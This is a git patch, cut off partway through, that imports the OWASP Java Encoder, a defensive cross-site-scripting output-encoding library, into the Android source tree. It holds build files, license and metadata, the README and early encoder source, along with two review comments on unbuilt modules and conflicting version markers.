From 6a30958ac795b8a4a03d052d8b1475ca207215cf Mon Sep 17 00:00:00 2001 
From: Andrew Vuong Date: Mon, 13 Mar 2023 22:54:17 +0000 Subject: Initial import of owasp-java-encoder from upstream main Bug: 262898801 Test: mma (cherry picked from https://android-review.googlesource.com/q/commit:3566f560590f91ac4e11b6b7494c9a4831804c3f) Merged-In: I89d97ac6be9533b10d9add01706d59260b686cdd Change-Id: I89d97ac6be9533b10d9add01706d59260b686cdd --- .gitignore | 20 + .travis.yml | 14 + Android.bp | 43 + LICENSE | 33 + META-INF/MANIFEST.MF | 9 + METADATA | 20 + MODULE_LICENSE_BSD | 0 README.md | 77 + core/pom.xml | 103 + .../src/main/java/org/owasp/encoder/ASCIIBits.java | 124 + .../main/java/org/owasp/encoder/CDATAEncoder.java | 312 ++ .../main/java/org/owasp/encoder/CSSEncoder.java | 303 ++ .../java/org/owasp/encoder/ChainedEncoder.java | 164 + core/src/main/java/org/owasp/encoder/Encode.java | 1430 ++++++ .../main/java/org/owasp/encoder/EncodedWriter.java | 215 + core/src/main/java/org/owasp/encoder/Encoder.java | 264 ++ core/src/main/java/org/owasp/encoder/Encoders.java | 260 ++ .../main/java/org/owasp/encoder/HTMLEncoder.java | 499 ++ .../main/java/org/owasp/encoder/JavaEncoder.java | 215 + .../java/org/owasp/encoder/JavaScriptEncoder.java | 298 ++ .../main/java/org/owasp/encoder/URIEncoder.java | 392 ++ core/src/main/java/org/owasp/encoder/Unicode.java | 95 + .../owasp/encoder/UnsupportedContextException.java | 53 + .../java/org/owasp/encoder/XMLCommentEncoder.java | 237 + .../main/java/org/owasp/encoder/XMLEncoder.java | 394 ++ core/src/main/resources/META-INF/LICENSE | 33 + core/src/site/markdown/index.md | 35 + core/src/site/site.xml | 41 + .../test/java/org/owasp/encoder/BenchmarkTest.java | 260 ++ .../java/org/owasp/encoder/CDATAEncoderTest.java | 99 + .../java/org/owasp/encoder/CSSEncoderTest.java | 90 + .../java/org/owasp/encoder/ChainedEncoderTest.java | 72 + .../test/java/org/owasp/encoder/EncodeTest.java | 160 + .../org/owasp/encoder/EncoderTestSuiteBuilder.java | 562 +++ .../test/java/org/owasp/encoder/EncodersTest.java | 73 + 
.../java/org/owasp/encoder/HTMLEncoderTest.java | 104 + .../java/org/owasp/encoder/JavaEncoderTest.java | 76 + .../org/owasp/encoder/JavaScriptEncoderTest.java | 126 + .../java/org/owasp/encoder/URIEncoderTest.java | 130 + .../org/owasp/encoder/XMLCommentEncoderTest.java | 101 + .../java/org/owasp/encoder/XMLEncoderTest.java | 138 + .../org/owasp/encoder/benchmark-data-1.txt | 427 ++ .../org/owasp/encoder/benchmark-data-2.txt | 4921 ++++++++++++++++++++ esapi/pom.xml | 73 + .../java/org/owasp/encoder/esapi/ESAPIEncoder.java | 254 + esapi/src/main/resources/META-INF/LICENSE | 33 + esapi/src/site/site.xml | 41 + .../org/owasp/encoder/esapi/ESAPIEncoderTest.java | 49 + esapi/src/test/resources/.esapi/ESAPI.properties | 38 + .../test/resources/esapi-java-logging.properties | 6 + jsp/pom.xml | 93 + .../java/org/owasp/encoder/tag/EncodingTag.java | 57 + .../java/org/owasp/encoder/tag/ForCDATATag.java | 52 + .../org/owasp/encoder/tag/ForCssStringTag.java | 52 + .../java/org/owasp/encoder/tag/ForCssUrlTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlContentTag.java | 52 + .../java/org/owasp/encoder/tag/ForHtmlTag.java | 52 + .../encoder/tag/ForHtmlUnquotedAttributeTag.java | 52 + .../encoder/tag/ForJavaScriptAttributeTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptBlockTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptSourceTag.java | 52 + .../org/owasp/encoder/tag/ForJavaScriptTag.java | 52 + .../org/owasp/encoder/tag/ForUriComponentTag.java | 53 + .../main/java/org/owasp/encoder/tag/ForUriTag.java | 52 + .../org/owasp/encoder/tag/ForXmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForXmlCommentTag.java | 52 + .../org/owasp/encoder/tag/ForXmlContentTag.java | 52 + .../main/java/org/owasp/encoder/tag/ForXmlTag.java | 52 + jsp/src/main/resources/META-INF/LICENSE | 33 + .../resources/META-INF/java-encoder-advanced.tld | 560 +++ jsp/src/main/resources/META-INF/java-encoder.tld | 403 ++ 
jsp/src/site/markdown/index.md | 31 + jsp/src/site/site.xml | 41 + .../org/owasp/encoder/tag/EncodingTagTest.java | 77 + .../org/owasp/encoder/tag/ForCDATATagTest.java | 77 + .../org/owasp/encoder/tag/ForCssStringTagTest.java | 77 + .../org/owasp/encoder/tag/ForCssUrlTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForHtmlTagTest.java | 77 + .../tag/ForHtmlUnquotedAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptBlockTagTest.java | 77 + .../encoder/tag/ForJavaScriptSourceTagTest.java | 77 + .../owasp/encoder/tag/ForJavaScriptTagTest.java | 46 + .../owasp/encoder/tag/ForUriComponentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForUriTagTest.java | 77 + .../owasp/encoder/tag/ForXmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForXmlCommentTagTest.java | 77 + .../owasp/encoder/tag/ForXmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForXmlTagTest.java | 77 + pom.xml | 496 ++ src/main/config/checkstyle-header.txt | 33 + src/main/config/checkstyle.xml | 204 + src/site/markdown/index.md | 56 + src/site/resources/images/owasp.jpg | Bin 0 -> 11488 bytes src/site/site.xml | 92 + 98 files changed, 17855 insertions(+) create mode 100644 .gitignore create mode 100644 .travis.yml create mode 100644 Android.bp create mode 100644 LICENSE create mode 100644 META-INF/MANIFEST.MF create mode 100644 METADATA create mode 100644 MODULE_LICENSE_BSD create mode 100644 README.md create mode 100644 core/pom.xml create mode 100644 core/src/main/java/org/owasp/encoder/ASCIIBits.java create mode 100644 core/src/main/java/org/owasp/encoder/CDATAEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/CSSEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/ChainedEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encode.java create mode 100644 
core/src/main/java/org/owasp/encoder/EncodedWriter.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoders.java create mode 100644 core/src/main/java/org/owasp/encoder/HTMLEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/URIEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Unicode.java create mode 100644 core/src/main/java/org/owasp/encoder/UnsupportedContextException.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLEncoder.java create mode 100644 core/src/main/resources/META-INF/LICENSE create mode 100644 core/src/site/markdown/index.md create mode 100644 core/src/site/site.xml create mode 100644 core/src/test/java/org/owasp/encoder/BenchmarkTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CSSEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/ChainedEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/EncodeTest.java create mode 100644 core/src/test/java/org/owasp/encoder/EncoderTestSuiteBuilder.java create mode 100644 core/src/test/java/org/owasp/encoder/EncodersTest.java create mode 100644 core/src/test/java/org/owasp/encoder/HTMLEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaScriptEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/URIEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLCommentEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLEncoderTest.java create mode 100644 
core/src/test/resources/org/owasp/encoder/benchmark-data-1.txt create mode 100644 core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt create mode 100644 esapi/pom.xml create mode 100644 esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java create mode 100644 esapi/src/main/resources/META-INF/LICENSE create mode 100644 esapi/src/site/site.xml create mode 100644 esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java create mode 100644 esapi/src/test/resources/.esapi/ESAPI.properties create mode 100644 esapi/src/test/resources/esapi-java-logging.properties create mode 100644 jsp/pom.xml create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java create mode 100644 
jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java create mode 100644 jsp/src/main/resources/META-INF/LICENSE create mode 100644 jsp/src/main/resources/META-INF/java-encoder-advanced.tld create mode 100644 jsp/src/main/resources/META-INF/java-encoder.tld create mode 100644 jsp/src/site/markdown/index.md create mode 100644 jsp/src/site/site.xml create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlTagTest.java create mode 100755 pom.xml create 
mode 100644 src/main/config/checkstyle-header.txt
create mode 100644 src/main/config/checkstyle.xml
create mode 100644 src/site/markdown/index.md
create mode 100644 src/site/resources/images/owasp.jpg
create mode 100644 src/site/site.xml
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..ab4a6f9
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,20 @@
+*/target/**
+/target/**
+# Intellij project files
+*.iml
+*.ipr
+*.iws
+.idea/
+# Eclipse project files
+.classpath
+.project
+.settings
+maven-eclipse.xml
+.externalToolBuilders
+# Netbeans configuration
+nb-configuration.xml
+*/nbproject/*
+
+/jsp/target/
+/esapi/target/
+/target/
diff --git a/.travis.yml b/.travis.yml
new file mode 100644
index 0000000..5206c1e
--- /dev/null
+++ b/.travis.yml
@@ -0,0 +1,14 @@
+language: java
+dist: trusty
+
+jdk:
+ - openjdk8
+ - oraclejdk8
+# to compile using JDK 9+ we must move from source and target 1.5 to 1.6
+# - openjdk9
+# - openjdk10
+# - openjdk11
+# - oraclejdk9
+# - oraclejdk10
+
+script: mvn test -B -X
diff --git a/Android.bp b/Android.bp
new file mode 100644
index 0000000..f2f0816
--- /dev/null
+++ b/Android.bp
@@ -0,0 +1,43 @@
+// Copyright (C) 2023 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["my_external_owasp_java_encoder_license"],
+}
+
+license {
+ name: "my_external_owasp_java_encoder_license",
+ visibility: [":__subpackages__"],
+ license_kinds: [
+ "SPDX-license-identifier-BSD",
+ ],
+ license_text: [
+ "LICENSE",
+ ],
+}
+
+java_library {
+ name: "owasp-java-encoder",
+ srcs: ["core/src/main/java/**/*.java"],
+ sdk_version: "current",
+ min_sdk_version: "33",
+ java_version: "1.8",
+ apex_available: [
+ "//apex_available:platform",
+ "com.android.ondevicepersonalization",
+ ],
+ visibility: [
+ "//packages/modules/OnDevicePersonalization:__subpackages__",
+ ],
+}
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..f66c375
--- /dev/null
+++ b/LICENSE
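Review bot: The `java_library` compiles only `core/src/main/java/**/*.java`, while the same commit imports the jsp/ and esapi/ modules (sources, tests and their pom.xml files) without any build rule referencing them, and nothing in Android.bp says whether leaving them unbuilt is deliberate. A comment above `srcs`, e.g. `// Only the dependency-free core encoder is built; jsp/ and esapi/ are imported but unused.`, would keep a later maintainer from wiring them in by accident. If they really are unused, trimming them from the import would also shrink the vendored surface that has to be tracked for upstream fixes; whether anything else in the tree depends on those directories is not visible here.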
@@ -0,0 +1,33 @@
+Copyright (c) 2015 Jeff Ichnowski
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+ * Redistributions of source code must retain the above
+ copyright notice, this list of conditions and the following
+ disclaimer.
+
+ * Redistributions in binary form must reproduce the above
+ copyright notice, this list of conditions and the following
+ disclaimer in the documentation and/or other materials
+ provided with the distribution.
+
+ * Neither the name of the OWASP nor the names of its
+ contributors may be used to endorse or promote products
+ derived from this software without specific prior written
+ permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+OF THE POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/META-INF/MANIFEST.MF b/META-INF/MANIFEST.MF
new file mode 100644
index 0000000..2aaee67
--- /dev/null
+++ b/META-INF/MANIFEST.MF
@@ -0,0 +1,9 @@
+Manifest-Version: 1.0
+Bnd-LastModified: 1533328833261
+Bundle-ManifestVersion: 2
+Bundle-Name: org.owasp.encoder
+Bundle-SymbolicName: org.owasp.encoder
+Bundle-Version: 1.2.1
+Created-By: 1.8.0_181 (Oracle Corporation)
+Export-Package: org.owasp.encoder
+Tool: Bnd-1.50.0
diff --git a/METADATA b/METADATA
new file mode 100644
index 0000000..83dd041
--- /dev/null
+++ b/METADATA
@@ -0,0 +1,20 @@
+name: "owasp-java-encoder"
+description:
+ "The OWASP Java Encoder is a Java 1.5+ simple-to-use drop-in "
+ "high-performance encoder class with no dependencies and little baggage. "
+ "This project will help Java web developers defend against Cross Site "
+ "Scripting!"
+
+third_party {
+ url {
+ type: HOMEPAGE
+ value: "https://owasp.org/www-project-java-encoder/"
+ }
+ url {
+ type: GIT
+ value: "https://github.com/OWASP/owasp-java-encoder.git"
+ }
+ version: "6309c0ad5d5a339f41dfa94384930f630d46bc4a"
+ last_upgrade_date { year: 2023 month: 2 day: 14 }
+ license_type: NOTICE
+}
diff --git a/MODULE_LICENSE_BSD b/MODULE_LICENSE_BSD
new file mode 100644
index 0000000..e69de29
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..e7dfd4f
--- /dev/null
+++ b/README.md
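Review bot: METADATA records `version` as the bare commit SHA `6309c0ad5d5a339f41dfa94384930f630d46bc4a`, while the imported tree carries conflicting release markers — core/pom.xml and README.md in this commit say 1.2.3 and the checked-in META-INF/MANIFEST.MF says `Bundle-Version: 1.2.1` — so a reader cannot tell which upstream release the vendored copy corresponds to, which is exactly what is needed when matching a later upstream advisory or fix against it. If the textproto accepts `#` comments, a line next to `version` such as `# upstream main as of 2023-02-14; pom.xml in the tree says 1.2.3, the checked-in MANIFEST.MF 1.2.1` would record that. The MANIFEST.MF looks like a build artifact from an older release (`Bnd-LastModified`, `Created-By`) rather than source, so it could be dropped or regenerated to stop advertising a stale version; whether the Android build consumes it at all is not visible here.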
@@ -0,0 +1,77 @@ +OWASP Java Encoder Project +========================== + +[![Build Status](https://travis-ci.org/OWASP/owasp-java-encoder.svg?branch=main)](https://travis-ci.org/OWASP/owasp-java-encoder) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) [![javadoc](https://javadoc.io/badge2/org.owasp.encoder/encoder/javadoc.svg)](https://javadoc.io/doc/org.owasp.encoder/encoder) + +Contextual Output Encoding is a computer programming technique necessary to stop +Cross-Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance +encoder class with little baggage. + +For more detailed documentation on the OWASP Javca Encoder please visit https://owasp.org/www-project-java-encoder/. + +Start using the OWASP Java Encoders +----------------------------------- +You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). + +JSP tags and EL functions are available in the encoder-jsp, also available in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2.3/encoder-jsp-1.2.3.jar). + +The jars are also available in Maven: + +```xml + + org.owasp.encoder + encoder + 1.2.3 + + + + org.owasp.encoder + encoder-jsp + 1.2.3 + +``` + +Quick Overview +-------------- +The OWASP Java Encoder library is intended for quick contextual encoding with very little +overhead, either in performance or usage. To get started, simply add the encoder-1.2.3.jar, +import org.owasp.encoder.Encode and start using. + +Example usage: + +```java + PrintWriter out = ....; + out.println(""); +``` + +Please look at the javadoc for Encode to see the variety of contexts for which you can encode. + +Happy Encoding! + +News +---- +### 2020-11-08 - 1.2.3 Release +The team is happy to announce that version 1.2.3 has been released! +* Update to make the manifest OSGi-compliant (#39). 
+* Update to support ESAPI 2.2 and later (#37). + +### 2018-09-14 - 1.2.2 Release +The team is happy to announce that version 1.2.2 has been released! +* This is a minor release fixing documentation and licensing issues. + +### 2017-02-19 - 1.2.1 Release +The team is happy to announce that version 1.2.1 has been released! +* The CDATA Encoder was modified so that it does not emit intermediate characters between adjacent CDATA sections. +* The documentation on [gh-pages](http://owasp.github.io/owasp-java-encoder/) has been improved. + +### 2015-04-12 - 1.2 Release on GitHub +OWASP Java Encoder has been moved to GitHub. Version 1.2 was also released! + +### 2014-03-31 - Documentation updated +Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use! + +### 2014-01-30 - Version 1.1.1 released +We're happy to announce that version 1.1.1 has been released. Along with a important bug fix, we added ESAPI integration to replace the legacy ESAPI encoders with the OWASP Java Encoder. + +### 2013-02-14 - Version 1.1 released +We're happy to announce that version 1.1 has been released. Along with a few minor encoding enhancements, we improved performance, and added a JSP tag and function library. diff --git a/core/pom.xml b/core/pom.xml new file mode 100644 index 0000000..29baed5 --- /dev/null +++ b/core/pom.xml 
@@ -0,0 +1,103 @@ + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2.3 + + + encoder + jar + + Java Encoder + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + org.owasp.encoder + + + + + + org.apache.maven.plugins + maven-surefire-plugin + + + org/owasp/encoder/BenchmarkTest.java + + + + + + + + benchmark + + + + org.apache.maven.plugins + maven-failsafe-plugin + + -Xmx1024m -XX:MaxPermSize=256m + + org/owasp/encoder/BenchmarkTest.java + + + + + + integration-test + verify + + + + + + + + + diff --git a/core/src/main/java/org/owasp/encoder/ASCIIBits.java b/core/src/main/java/org/owasp/encoder/ASCIIBits.java new file mode 100644 index 0000000..33a3a33 --- /dev/null +++ b/core/src/main/java/org/owasp/encoder/ASCIIBits.java 
@@ -0,0 +1,124 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder;
+
+/**
+ * ASCIIBits - Small helper class for building up 128-bit bit-mask (2 longs)
+ * to be used testing lower-ASCII characters. It helps make some other code
+ * easier to read. It is not intended to be public.
+ */
+class ASCIIBits {
+ /** Lower 64 bits. */
+ long _lowerMask;
+ /** Upper 64 bits.
*/ + long _upperMask; + + /** + * Sets a bit to 1 for each character in the argument string. No checking + * is performed to see if characters are in the valid range 0..127. + * + * @param chars the characters to set to 1. + * @return {@code this} + */ + ASCIIBits set(String chars) { + for (int i=0, n=chars.length() ; i". This encoder removes invalid XML characters, and encodes + * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is + * maintained, but the code receiving the output will have to handle multiple + * CDATA events. As an alternate approach, the caller could pre-encode "]]>" to + * something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then + * use this encoder to remove any invalid XML characters. + * + * @author Jeff Ichnowski + */ +class CDATAEncoder extends Encoder { + + /** + * The encoding of @{code "]]>"}. + */ + private static final char[] CDATA_END_ENCODED + = "]]]]>".toCharArray(); + + /** + * Length of {@code "]]]]>"}. + */ + private static final int CDATA_END_ENCODED_LENGTH = 15; + + /** + * Length of {@code "]]>"}. + */ + private static final int CDATA_END_LENGTH = 3; + + @Override + protected int maxEncodedLength(int n) { + // "]" becomes "]" (1 -> 1) + // "]]" becomes "]]" (2 -> 2) + // "]]>" becomes "]]]]>" (3 -> 15) + // "]]>]" becomes "]]]]>]" (3 -> 15 + 1 -> 1) + // ... + + int worstCase = n / CDATA_END_LENGTH; + int remainder = n % CDATA_END_LENGTH; + + return worstCase * CDATA_END_ENCODED_LENGTH + remainder; + +// return (n - remainder) * 5 + remainder; + } + + @Override + protected int firstEncodedOffset(String input, int off, int len) { + final int n = off + len; + //int closeCount = 0; //unused... 
+ for (int i = off; i < n; ++i) { + char ch = input.charAt(i); + if (ch <= Unicode.MAX_ASCII) { + if (ch != ']') { + if (ch < ' ' && ch != '\n' && ch != '\r' && ch != '\t') { + return i; +// } else { +// // valid + } + + } else if (i + 1 < n) { + if (input.charAt(i + 1) != ']') { + // "]x" (next character is safe for this to be ']') + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { + // valid + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (input.charAt(i + 2) == '>') { + return i; +// } else { +// // valid + } + + } else { + return n; + } + } + } else { + return n; + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) { + return i; +// } else { +// // valid + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i + 1 < n) { + if (Character.isLowSurrogate(input.charAt(i + 1))) { + int cp = Character.toCodePoint(ch, input.charAt(i + 1)); + if (Unicode.isNonCharacter(cp)) { + return i; + } else { + ++i; + // valid pair + } + } else { + return i; + } + } else { + // end of input, high without low = invalid + return i; + } + } else if (// low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { + return i; +// } else { +// // valid + } + + } + return n; + } + + @Override + protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { + final char[] in = input.array(); + final char[] out = output.array(); + int i = input.arrayOffset() + input.position(); + final int n = input.arrayOffset() + input.limit(); + int j = output.arrayOffset() + output.position(); + final int m = output.arrayOffset() + output.limit(); + + for (; i < n; ++i) { + char ch = in[i]; + if (ch <= Unicode.MAX_ASCII) { + if (ch 
!= ']') { + if (j >= m) { + return overflow(input, i, output, j); + } + if (ch >= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { + out[j++] = ch; + } else { + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (i + 1 < n) { + if (in[i + 1] != ']') { + // "]x" (next character is safe for this to be ']') + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && in[i + 2] == ']'; ++i) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (in[i + 2] == '>') { + if (j + CDATA_END_ENCODED_LENGTH > m) { + return overflow(input, i, output, j); + } + System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); + j += CDATA_END_ENCODED_LENGTH; + i += 2; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + } else if (endOfInput) { + if (j + 2 > m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + out[j++] = ']'; + i = n; + break; + } else { + break; + } + } + } else if (endOfInput) { + // seen "]", then end of input. 
